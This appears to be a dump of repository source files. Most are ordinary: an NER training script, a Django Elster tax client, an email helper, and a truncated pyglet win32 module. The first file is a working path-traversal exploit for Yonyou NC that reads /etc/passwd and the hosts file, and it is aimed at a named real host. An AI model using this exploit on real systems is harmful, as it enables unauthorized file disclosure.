hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acfb37e7e0a118d496771fd2c7339b134f96c119 | 971 | py | Python | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name: 用友 country 和 language字段任意文件下载
Author : a
mail : a@lcx.cc
Referer :http://www.wooyun.org/bugs/wooyun-2015-096676
"""
def assign(service, arg):
    """Return (True, arg) when the scanner service matches, else None."""
    # This exploit module only handles the yongyou_nc fingerprint.
    return (True, arg) if service == "yongyou_nc" else None
def audit(arg):
    """Probe the Yonyou NC loadConst.d country/language arbitrary-file-download."""
    # Traversal payloads for a Windows hosts file and an /etc/passwd path
    # (with %00 null-byte truncation of the .html suffix).
    traversal_payloads = (
        '/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts%00.html',
        '/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00.html',
    )
    for traversal in traversal_payloads:
        target = arg + traversal
        # curl/security_hole are injected by the Bugscan framework at runtime.
        code, head, res, errcode, _ = curl.curl('"%s"' % target)
        # A 200 whose headers still reference const.js means the file was served.
        if code == 200 and "const.js" in head:
            security_hole(target)
if __name__ == '__main__':
    # Standalone run: the dummy module supplies the scanner-framework stubs
    # (curl, security_hole, ...) normally injected by Bugscan at runtime.
    from dummy import *
    # assign(...)[1] unpacks the target URL from the (True, arg) tuple.
    audit(assign('yongyou_nc','http://www.jumbohr.cn:8088/')[1])
| 31.322581 | 164 | 0.526262 |
acfb3a44eafc3a4b9b0827259f7b2ba8ccbfa0fc | 10,347 | py | Python | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import argparse
import warnings
import traceback
import torch
import transformers
from packaging import version
from transformer_ner.task import run_task
from transformer_biaffine_ner.task import run_task as run_biaffine_task
from transformer_ner.transfomer_log import TransformerNERLogger
# Guard: this code depends on the transformers >=3.0.0 API surface.
# (The variable was previously misnamed `pytorch_version` although it holds
# the transformers package version.)
transformers_version = version.parse(transformers.__version__)
assert transformers_version >= version.parse('3.0.0'), \
    'we now only support transformers version >=3.0.0, but your version is {}'.format(transformers_version)
def main():
    """Parse the command line, validate the run configuration, and launch the
    transformer NER task (plain softmax, CRF, or biaffine head).

    Raises:
        RuntimeError: when the argument combination is invalid (no model
            source, prediction without output file, CRF + biaffine together).
    """
    parser = argparse.ArgumentParser()
    # --- model source and tokenizer/config overrides ---
    parser.add_argument("--model_type", default='bert', type=str, required=True,
                        help="valid values: bert, roberta or xlnet")
    parser.add_argument("--pretrained_model", type=str, default=None,
                        help="The pretrained model file or directory for fine tuning.")
    # resume training on a NER model; if set it will overwrite pretrained_model
    parser.add_argument("--resume_from_model", type=str, default=None,
                        help="The NER model file or directory for continuous fine tuning.")
    parser.add_argument("--config_name", default=None, type=str,
                        help="Pretrained config name or path if not the same as pretrained_model")
    parser.add_argument("--tokenizer_name", default=None, type=str,
                        help="Pretrained tokenizer name or path if not the same as pretrained_model")
    # --- data and output locations ---
    parser.add_argument("--data_dir", type=str, required=True,
                        help="The input data directory.")
    parser.add_argument("--data_has_offset_information", action='store_true',
                        help="Whether the input data contains token offset information.")
    parser.add_argument("--new_model_dir", type=str, required=True,
                        help="directory for saving new model checkpoints (keep latest n only)")
    parser.add_argument("--save_model_core", action='store_true',
                        help="""save the transformer core of the model
                        which allows model to be used as base model for further pretraining""")
    parser.add_argument("--predict_output_file", type=str, default=None,
                        help="predicted results output file.")
    parser.add_argument('--overwrite_model_dir', action='store_true',
                        help="Overwrite the content of the new model directory")
    # --- training hyperparameters ---
    parser.add_argument("--seed", default=3, type=int,
                        help='random seed')
    parser.add_argument("--max_seq_length", default=128, type=int,
                        help="maximum number of tokens allowed in each sentence")
    parser.add_argument("--do_train", action='store_true',
                        help="Whether to run training.")
    parser.add_argument("--model_selection_scoring", default='strict-f_score-1', type=str,
                        help="""The scoring method used to select model on dev dataset
                        only support strict-f_score-n, relax-f_score-n (n is 0.5, 1, or 2)""")
    parser.add_argument("--do_predict", action='store_true',
                        help="Whether to run prediction on the test set.")
    parser.add_argument("--use_crf", action='store_true',
                        help="Whether to use crf layer as classifier.")
    parser.add_argument("--do_lower_case", action='store_true',
                        help="Set this flag if you are using an uncased model.")
    parser.add_argument("--train_batch_size", default=8, type=int,
                        help="The batch size for training.")
    parser.add_argument("--eval_batch_size", default=8, type=int,
                        help="The batch size for eval.")
    parser.add_argument('--train_steps', type=int, default=-1,
                        help="Number of training steps between two evaluations on the dev set; "
                             "if <0 then evaluate after each epoch")
    parser.add_argument("--learning_rate", default=1e-5, type=float,
                        help="The initial learning rate for optimizer.")
    parser.add_argument("--min_lr", default=1e-6, type=float,
                        help="The minimum number that lr can decay to.")
    parser.add_argument("--num_train_epochs", default=10, type=float,
                        help="Total number of training epochs to perform.")
    parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
                        help="Number of updates steps to accumulate before performing a backward/update pass.")
    parser.add_argument("--do_warmup", action='store_true',
                        help='Whether to apply warmup strategy in optimizer.')
    parser.add_argument("--warmup_ratio", default=0.1, type=float,
                        help="Linear warmup over warmup_ratio.")
    parser.add_argument("--weight_decay", default=0.0, type=float,
                        help="Weight decay if we apply some.")
    parser.add_argument("--adam_epsilon", default=1e-8, type=float,
                        help="Epsilon for Adam optimizer.")
    parser.add_argument("--max_grad_norm", default=1.0, type=float,
                        help="Max gradient norm.")
    parser.add_argument("--max_num_checkpoints", default=3, type=int,
                        help="max number of checkpoints saved during training, old checkpoints will be removed.")
    # --- logging and progress reporting ---
    parser.add_argument("--log_file", default=None,
                        help="where to save the log information")
    parser.add_argument("--log_lvl", default="i", type=str,
                        help="d=DEBUG; i=INFO; w=WARNING; e=ERROR")
    parser.add_argument("--progress_bar", action='store_true',
                        help="show progress during the training in tqdm")
    parser.add_argument("--early_stop", default=-1, type=int,
                        help="""The training will stop after num of epoch without performance improvement.
                        If set to 0 or -1, then not use early stop.""")
    # --- loss function and model-head options ---
    parser.add_argument('--focal_loss', action='store_true',
                        help="use focal loss function instead of cross entropy loss")
    parser.add_argument("--focal_loss_gamma", default=2, type=int,
                        help="the gamma hyperparameter in focal loss, commonly use 1 or 2")
    parser.add_argument("--use_biaffine", action='store_true',
                        help="Whether to use biaffine for NER (https://www.aclweb.org/anthology/2020.acl-main.577/).")
    parser.add_argument("--mlp_dim", default=128, type=int,
                        help="The output dimension for MLP layer in biaffine module, default to 128."
                             "If set this value <= 0, we use transformer model hidden layer dimension")
    parser.add_argument("--mlp_layers", default=0, type=int,
                        help="The number of layers in MLP in biaffine module, default to 0 (1 linear layer)."
                             "if set to 1, then MLP will have three linear layers")
    parser.add_argument("--mlp_hidden_dim", default=0, type=int,
                        help="The hidden dim of MLP layers in biaffine module, default to 0 (no use hidden layer)")
    # adversarial training method: pgd, fgm
    parser.add_argument("--adversarial_training_method", default=None,
                        help="what method to use for adversarial training, support pgd and fgm; "
                             "default is None which disable this function")
    # fp16 and distributed training (we use pytorch naive implementation instead of Apex)
    parser.add_argument('--fp16', action='store_true',
                        help="Whether to use 16-bit float precision instead of 32-bit")
    # TODO: data parallel - support single node multi GPUs (use deepspeed only or pytorch naive ddp?)
    # parser.add_argument("--local_rank", type=int, default=-1, help="local_rank for distributed training on gpus")
    global_args = parser.parse_args()
    # create logger and attach it to the args namespace so tasks can use it
    logger = TransformerNERLogger(global_args.log_file, global_args.log_lvl).get_logger()
    global_args.logger = logger
    # set and check cuda (we recommend to set up CUDA device in shell)
    # os.environ['CUDA_VISIBLE_DEVICES'] = global_args.cuda_ids
    global_args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    logger.info("Task will use cuda device: GPU_{}.".format(
        torch.cuda.current_device()) if torch.cuda.device_count() else 'Task will use CPU.')
    # if resume_from_model is used, it overwrites pretrained_model
    if global_args.resume_from_model:
        global_args.pretrained_model = global_args.resume_from_model
    if global_args.resume_from_model is None and global_args.pretrained_model is None:
        raise RuntimeError("""Both resume_from_model and pretrained_model are not set.
        You have to specify one of them.""")
    # if tokenizer_name / config_name are not explicitly set, default them to pretrained_model
    if not global_args.tokenizer_name:
        global_args.tokenizer_name = global_args.pretrained_model
        logger.warning("set tokenizer as {}".format(global_args.tokenizer_name))
    if not global_args.config_name:
        global_args.config_name = global_args.pretrained_model
        logger.warning("set config as {}".format(global_args.config_name))
    if global_args.do_predict and not global_args.predict_output_file:
        raise RuntimeError("Running prediction but predict output file is not set.")
    # CRF computes its own loss via Viterbi decoding, so focal loss is ignored
    if global_args.focal_loss and global_args.use_crf:
        warnings.warn(
            "Using CRF cannot apply focal loss. CRF use viterbi decoding and loss will be calculated independently.")
        warnings.warn("We will overwrite focal loss to false and use CRF as default.")
        global_args.focal_loss = False
    if global_args.use_crf and global_args.use_biaffine:
        raise RuntimeError("You can not run both CRF and biaffine. Choose only one or None of them to proceed.")
    try:
        if global_args.use_biaffine:
            run_biaffine_task(global_args)
        else:
            run_task(global_args)
    except Exception:
        # Surface the full stack trace on stderr and in the task log file.
        traceback.print_exc()
        logger.error(traceback.format_exc())
| 58.457627 | 118 | 0.653523 |
acfb3ac3fa6d7cf52851f72132016ac552f0f64e | 15,507 | py | Python | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 20 | 2021-07-02T07:49:08.000Z | 2022-03-18T22:26:10.000Z | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 555 | 2021-06-28T15:35:15.000Z | 2022-03-31T11:51:55.000Z | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 1 | 2021-07-04T20:34:12.000Z | 2021-07-04T20:34:12.000Z | import logging
import json
from datetime import datetime
from decimal import Decimal
import requests
from flask_login import current_user, logout_user
from markupsafe import escape
from app.config import Config
from app.data_access.audit_log_controller import create_audit_log_entry, create_audit_log_address_entry
from app.elster_client.elster_errors import ElsterGlobalError, ElsterGlobalValidationError, \
ElsterGlobalInitialisationError, ElsterTransferError, ElsterCryptError, ElsterIOError, ElsterPrintError, \
ElsterNullReturnedError, ElsterUnknownError, ElsterAlreadyRequestedError, ElsterRequestIdUnkownError, \
ElsterResponseUnexpectedStructure, GeneralEricaError, EricaIsMissingFieldError, ElsterRequestAlreadyRevoked, \
ElsterInvalidBufaNumberError, ElsterInvalidTaxNumberError
from app.utils import lru_cached, VERANLAGUNGSJAHR
logger = logging.getLogger(__name__)
# Base URL of the Erica (pyeric) service, taken from application config.
_PYERIC_API_BASE_URL = Config.ERICA_BASE_URL
# Hard request timeout (seconds) applied to every call to Erica.
_REQUEST_TIMEOUT = 20
# Form fields that may arrive as 'yes'/'no' strings and must become booleans.
_BOOL_KEYS = ['familienstand_married_lived_separated', 'familienstand_widowed_lived_separated',
              'person_b_same_address', 'request_new_tax_number',
              'person_a_has_pflegegrad', 'person_a_has_merkzeichen_bl',
              'person_a_has_merkzeichen_tbl', 'person_a_has_merkzeichen_h', 'person_a_has_merkzeichen_g',
              'person_a_has_merkzeichen_ag', 'person_a_requests_pauschbetrag', 'person_a_requests_fahrtkostenpauschale',
              'person_b_has_pflegegrad', 'person_b_has_merkzeichen_bl',
              'person_b_has_merkzeichen_tbl', 'person_b_has_merkzeichen_h', 'person_b_has_merkzeichen_g',
              'person_b_has_merkzeichen_ag', 'person_b_requests_pauschbetrag', 'person_b_requests_fahrtkostenpauschale',]
# Monetary form fields that must be converted to Decimal before sending.
_DECIMAL_KEYS = ['stmind_haushaltsnahe_summe', 'stmind_handwerker_summe', 'stmind_handwerker_lohn_etc_summe',
                 'stmind_vorsorge_summe', 'stmind_religion_paid_summe', 'stmind_religion_reimbursed_summe',
                 'stmind_krankheitskosten_summe', 'stmind_krankheitskosten_anspruch', 'stmind_pflegekosten_summe',
                 'stmind_pflegekosten_anspruch', 'stmind_beh_aufw_summe',
                 'stmind_beh_aufw_anspruch', 'stmind_bestattung_summe', 'stmind_bestattung_anspruch',
                 'stmind_aussergbela_sonst_summe', 'stmind_aussergbela_sonst_anspruch']
# Form fields holding ISO ('%Y-%m-%d') date strings that must become date objects.
_DATE_KEYS = ['familienstand_date', 'familienstand_married_lived_separated_since',
              'familienstand_widowed_lived_separated_since', 'person_a_dob', 'person_b_dob', 'dob']
def send_to_erica(*args, **kwargs):
    """POST to the Erica service (or the mock API in test configurations)."""
    logger.info(f'Making Erica POST request with args {args!r}')
    if Config.USE_MOCK_API:
        from tests.elster_client.mock_erica import MockErica
        response = MockErica.mocked_elster_requests(*args, **kwargs)
    else:
        response = requests.post(*args, headers={'Content-type': 'application/json'},
                                 timeout=_REQUEST_TIMEOUT, **kwargs)
    logger.info(f'Completed Erica POST request with args {args!r}, got code {response.status_code}')
    return response
def request_from_erica(*args, **kwargs):
    """GET from the Erica service (or the mock API when USE_MOCK_API is on)."""
    logger.info(f'Making Erica GET request with args {args!r}')
    if not Config.USE_MOCK_API:
        json_headers = {'Content-type': 'application/json'}
        response = requests.get(*args, headers=json_headers, timeout=_REQUEST_TIMEOUT, **kwargs)
    else:
        from tests.elster_client.mock_erica import MockErica
        response = MockErica.mocked_elster_requests(*args, **kwargs)
    logger.info(f'Completed Erica GET request with args {args!r}, got code {response.status_code}')
    return response
def send_est_with_elster(form_data, ip_address, year=VERANLAGUNGSJAHR, include_elster_responses=True):
    """Submit an income tax declaration (ESt) to Elster through Erica.

    Sends the converted form data, writes an audit-log entry with the
    transfer ticket, and returns the extracted response data.
    """
    request_payload = _generate_est_request_data(form_data, year=year)
    pyeric_response = send_to_erica(
        _PYERIC_API_BASE_URL + '/ests',
        data=json.dumps(request_payload, default=str),
        params={'include_elster_responses': include_elster_responses})
    check_pyeric_response_for_errors(pyeric_response)
    create_audit_log_entry('est_submitted', ip_address, form_data['idnr'],
                           pyeric_response.json()['transfer_ticket'])
    return _extract_est_response_data(pyeric_response)
def validate_est_with_elster(form_data, year=VERANLAGUNGSJAHR, include_elster_responses=True):
    """Validate an ESt data set against Elster via Erica without submitting it."""
    request_payload = _generate_est_request_data(form_data, year=year)
    pyeric_response = send_to_erica(
        _PYERIC_API_BASE_URL + '/est_validations',
        data=json.dumps(request_payload, default=str),
        params={'include_elster_responses': include_elster_responses})
    check_pyeric_response_for_errors(pyeric_response)
    return _extract_est_response_data(pyeric_response)
def send_unlock_code_request_with_elster(form_data, ip_address, include_elster_responses=False):
    """Request a new Elster unlock code via Erica and audit-log the request."""
    erica_response = send_to_erica(
        _PYERIC_API_BASE_URL + '/unlock_code_requests',
        data=json.dumps(form_data, default=str),
        params={'include_elster_responses': include_elster_responses})
    check_pyeric_response_for_errors(erica_response)
    result = erica_response.json()
    # Every successful request is recorded with its Elster identifiers.
    create_audit_log_entry('unlock_code_request_sent', ip_address, form_data['idnr'],
                           result['transfer_ticket'], result['elster_request_id'])
    return result
def send_unlock_code_activation_with_elster(form_data, elster_request_id, ip_address, include_elster_responses=False):
    """Activate a previously requested unlock code via Erica and audit-log it."""
    # Enrich a copy of the form data with the request id from the earlier step.
    activation_payload = dict(form_data, elster_request_id=elster_request_id)
    erica_response = send_to_erica(
        _PYERIC_API_BASE_URL + '/unlock_code_activations',
        data=json.dumps(activation_payload, default=str),
        params={'include_elster_responses': include_elster_responses})
    check_pyeric_response_for_errors(erica_response)
    result = erica_response.json()
    create_audit_log_entry('unlock_code_activation_sent', ip_address, form_data['idnr'],
                           result['transfer_ticket'], result['elster_request_id'])
    return result
def send_unlock_code_revocation_with_elster(form_data, ip_address, include_elster_responses=False):
    """Revoke an Elster unlock code via Erica and audit-log the revocation."""
    erica_response = send_to_erica(
        _PYERIC_API_BASE_URL + '/unlock_code_revocations',
        data=json.dumps(form_data, default=str),
        params={'include_elster_responses': include_elster_responses})
    check_pyeric_response_for_errors(erica_response)
    result = erica_response.json()
    create_audit_log_entry('unlock_code_revocation_sent', ip_address, form_data['idnr'],
                           result['transfer_ticket'], result['elster_request_id'])
    return result
@lru_cached
def validate_tax_number(state_abbreviation, tax_number):
    """Ask Erica whether the tax number is valid for the given state (memoized)."""
    erica_response = request_from_erica(
        _PYERIC_API_BASE_URL + f'/tax_number_validity/{state_abbreviation}/{tax_number}')
    check_pyeric_response_for_errors(erica_response)
    return erica_response.json()['is_valid']
@lru_cached
def request_tax_offices():
    """Fetch the list of German tax offices from Erica (memoized)."""
    erica_response = request_from_erica(_PYERIC_API_BASE_URL + '/tax_offices')
    check_pyeric_response_for_errors(erica_response)
    return erica_response.json()['tax_offices']
def _extract_est_response_data(pyeric_response):
    """Build the user-facing result dict from a pyeric ESt response.

    Raises ElsterResponseUnexpectedStructure when the mandatory keys
    ('pdf', 'transfer_ticket') are missing from the response body.
    """
    payload = pyeric_response.json()
    if 'pdf' not in payload or 'transfer_ticket' not in payload:
        raise ElsterResponseUnexpectedStructure
    result = {
        'was_successful': pyeric_response.status_code in [200, 201],
        'pdf': payload['pdf'].encode(),
        'transfer_ticket': escape(payload['transfer_ticket']),
    }
    # Elster raw responses are only present when explicitly requested.
    for optional_key in ('eric_response', 'server_response'):
        if optional_key in payload:
            result[optional_key] = escape(payload[optional_key])
    return result
class TaxDeclarationNotDigitallySigned(Exception):
    """Raised when a tax declaration without a digital signature would be sent."""
def _generate_est_request_data(form_data, year=VERANLAGUNGSJAHR):
    """
    Generate the request payload for pyeric with the correct value types.

    :param form_data: All information about the user's taxes, taken from the user form
    :param year: The year in which the taxes are declared
    :raises TaxDeclarationNotDigitallySigned: if the current user is not active,
        not authenticated, or has no unlock code (i.e. no digital signature)
    """
    adapted_form_data = form_data.copy()
    if adapted_form_data.pop('is_user_account_holder', None):
        adapted_form_data['account_holder'] = 'person_a'
    # 'yes'/'no' radio answers (and any other truthy values) become booleans.
    for key in list(set(_BOOL_KEYS) & set(adapted_form_data.keys())):
        if isinstance(adapted_form_data[key], str):
            adapted_form_data[key] = adapted_form_data[key] == 'yes'
        else:
            adapted_form_data[key] = bool(adapted_form_data[key])
    # Monetary fields become Decimal; falsy (empty) values are left untouched.
    for key in list(set(_DECIMAL_KEYS) & set(adapted_form_data.keys())):
        if adapted_form_data[key]:
            adapted_form_data[key] = Decimal(adapted_form_data[key])
    # ISO date strings become datetime.date objects.
    for key in list(set(_DATE_KEYS) & set(adapted_form_data.keys())):
        if isinstance(adapted_form_data[key], str):
            adapted_form_data[key] = datetime.strptime(adapted_form_data[key], '%Y-%m-%d').date()
    if adapted_form_data.get('steuernummer_exists') == 'no' and adapted_form_data.get('request_new_tax_number'):
        adapted_form_data['submission_without_tax_nr'] = True
    if not current_user.is_active:
        # no non-active user should come until here, but we want to log that as an error
        logger.error('Elster_Client: Non-active user tried to send tax declaration.')
        raise TaxDeclarationNotDigitallySigned
    if not current_user.is_authenticated:
        # no non-authenticated user should come until here, but we want to log that as an error
        logger.error('Elster_Client: Non-authenticated user tried to send tax declaration.')
        raise TaxDeclarationNotDigitallySigned
    if current_user.unlock_code_hashed is None:
        # no user should come until that point without an unlock code, but they should certainly not be able to send a tax declaration
        logger.warning('Elster_Client: User without unlock code tried to send tax declaration.')
        raise TaxDeclarationNotDigitallySigned
    meta_data = {
        'year': year,
    }
    return {'est_data': adapted_form_data, 'meta_data': meta_data}
def check_pyeric_response_for_errors(pyeric_response):
    """Raise a specific Elster* exception for any non-success pyeric response.

    2xx responses pass silently. A 422 with a structured ``detail`` dict is
    logged and mapped onto the numeric error-code table below; a 422 with
    missing-field validation errors raises EricaIsMissingFieldError; any
    other failure becomes a GeneralEricaError.
    """
    if pyeric_response.status_code in [200, 201]:
        return
    if pyeric_response.status_code == 422 and isinstance(pyeric_response.json()['detail'], dict):
        error_detail = pyeric_response.json()['detail']
        error_code = error_detail['code']
        # escape() everything that may be echoed back to a user or a template.
        error_message = escape(error_detail['message'])
        eric_response = escape(error_detail.get('eric_response'))
        server_response = escape(error_detail.get('server_response'))
        validation_problems = [escape(problem) for problem in
                               error_detail.get('validation_problems')] if error_detail.get(
            'validation_problems') else None
        server_err_msg = error_detail.get('server_err_msg')
        erica_error = f'Error in erica response: code={error_code}, message="{error_message}", ' \
                      f'eric_response="{eric_response}", server_response="{server_response}", ' \
                      f'validation_problems="{validation_problems}" '
        if server_err_msg:
            # Elster transfer-header diagnostics, appended to the log line.
            th_res_code = escape(error_detail.get('server_err_msg').get('TH_RES_CODE'))
            th_error_msg = escape(error_detail.get('server_err_msg').get('TH_ERR_MSG'))
            ndh_error_xml = escape(error_detail.get('server_err_msg').get('NDH_ERR_XML'))
            erica_error += f', elster_th_res_code="{th_res_code}", elster_th_error_msg="{th_error_msg}", ' \
                           f'elster_ndh_error_xml="{ndh_error_xml}"'
        logger.info(erica_error)
        # Numeric Erica error codes -> domain exceptions (see elster_errors).
        if error_code == 1:
            raise ElsterGlobalError(message=error_message)
        elif error_code == 2:
            raise ElsterGlobalValidationError(message=error_message, eric_response=eric_response,
                                              validation_problems=validation_problems)
        elif error_code == 3:
            raise ElsterGlobalInitialisationError(message=error_message)
        elif error_code == 4:
            raise ElsterTransferError(message=error_message, eric_response=eric_response,
                                      server_response=server_response)
        elif error_code == 5:
            raise ElsterCryptError(message=error_message)
        elif error_code == 6:
            raise ElsterIOError(message=error_message)
        elif error_code == 7:
            raise ElsterPrintError(message=error_message)
        elif error_code == 8:
            raise ElsterNullReturnedError(message=error_message)
        elif error_code == 9:
            raise ElsterAlreadyRequestedError(message=error_message, eric_response=eric_response,
                                              server_response=server_response)
        elif error_code == 10:
            raise ElsterRequestIdUnkownError(message=error_message, eric_response=eric_response,
                                             server_response=server_response)
        elif error_code == 11:
            raise ElsterRequestAlreadyRevoked(message=error_message, eric_response=eric_response,
                                              server_response=server_response)
        elif error_code == 12:
            raise ElsterInvalidBufaNumberError()
        elif error_code == 13:
            raise ElsterInvalidTaxNumberError(message=error_message, eric_response=eric_response)
        else:
            raise ElsterUnknownError(message=error_message)
    elif pyeric_response.status_code == 422 and \
            any([error.get('type') == "value_error.missing" for error in pyeric_response.json()['detail']]):
        raise EricaIsMissingFieldError()
    else:
        raise GeneralEricaError(message=pyeric_response.content)
def _log_address_data(ip_address, idnr, params):
    """Request address data for *idnr* from Erica and write it to the audit log."""
    pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/address',
                                    data=json.dumps({'idnr': idnr}, default=str),
                                    params=params)
    check_pyeric_response_for_errors(pyeric_response)
    create_audit_log_address_entry('est_address_queried', ip_address, idnr,
                                   pyeric_response.json()['address'])
| 48.459375 | 134 | 0.710195 |
acfb3c73dc0bcd9072f1f1ca8622a9f69b51ade0 | 652 | py | Python | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | from .models import Mail
from .tasks import send_asynchronous_mail
from django.conf import settings
def create_and_send_mail(**kwargs):
    """Create a Mail object and queue it for asynchronous delivery.

    Example:
        create_and_send_mail(template_name="hello", context={'name': 'Jens'},
                             to_address="me@jensneuhaus.de")
    """
    # The module-level imports already provide Mail and send_asynchronous_mail;
    # the previous in-function re-imports were redundant and also pushed the
    # docstring after statements (so it was not a real docstring).
    mail = Mail.objects.create_mail(**kwargs)
    # sendgrid_api falls back to False when SENDGRID_API_KEY is not configured.
    send_asynchronous_mail.delay(
        mail.id, sendgrid_api=getattr(settings, "SENDGRID_API_KEY", False)
    )
def _noautoescape(template):
return "{}{}{}".format("{% autoescape off %}", template, "{% endautoescape %}")
| 28.347826 | 105 | 0.711656 |
acfb3cdf8ee8fb90af27bf8d82e1f9e03e0072a3 | 12,074 | py | Python | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2019 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: $
from __future__ import print_function
from __future__ import absolute_import
from builtins import object
import struct
import pyglet
from . import constants
from .types import *
# True when running a 64-bit Python (pointer size is 8 bytes).
IS64 = struct.calcsize("P") == 8
# When the debug_win32 option is set, every call through the wrapped system
# libraries below is error-checked and failures are appended to a log file.
_debug_win32 = pyglet.options['debug_win32']
if _debug_win32:
    import traceback
    # Raw (unwrapped) kernel32 entry points used by the debug machinery itself.
    _GetLastError = windll.kernel32.GetLastError
    _SetLastError = windll.kernel32.SetLastError
    _FormatMessageA = windll.kernel32.FormatMessageA
    # NOTE(review): this handle stays open for the life of the process.
    _log_win32 = open('debug_win32.log', 'w')
def format_error(err):
msg = create_string_buffer(256)
_FormatMessageA(constants.FORMAT_MESSAGE_FROM_SYSTEM,
c_void_p(),
err,
0,
msg,
len(msg),
c_void_p())
return msg.value
    class DebugLibrary(object):
        """Proxy around a ctypes library that logs Win32 errors after each call."""
        def __init__(self, lib):
            self.lib = lib
        def __getattr__(self, name):
            # Resolve the real ctypes function for the requested attribute.
            fn = getattr(self.lib, name)
            def f(*args):
